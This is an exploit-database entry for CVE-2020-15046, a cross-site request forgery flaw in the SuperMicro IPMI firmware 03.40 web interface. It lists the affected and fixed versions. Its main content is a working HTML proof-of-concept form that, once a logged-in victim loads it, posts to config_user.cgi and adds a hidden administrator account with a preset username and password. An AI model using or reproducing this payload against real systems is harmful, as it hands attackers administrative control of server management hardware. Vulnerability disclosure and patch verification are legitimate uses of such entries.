SuperMicro IPMI 03.40 Cross Site Request Forgery

2020.07.12
Credit: Metin Yunus Kandemir
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2020-15046
CWE: CWE-352

# Exploit Title: SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin) # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.supermicro.com/ # Software Link: https://www.supermicro.com/en/solutions/management-software/bmc-resources # Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 # CVE: CVE-2020-15046 # Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery # Description: # The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and # IPMI firmware 03.40 # allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users. # The fixed versions are BIOS 3.2 and firmware 03.88. # PoC : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST"> <input type="hidden" name="username" value="JOKER" /> <input type="hidden" name="original&#95;username" value="2" /> <input type="hidden" name="password" value="onebadday" /> <input type="hidden" name="new&#95;privilege" value="4" /> <input type="submit" value="submit request" /> </form> </body> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top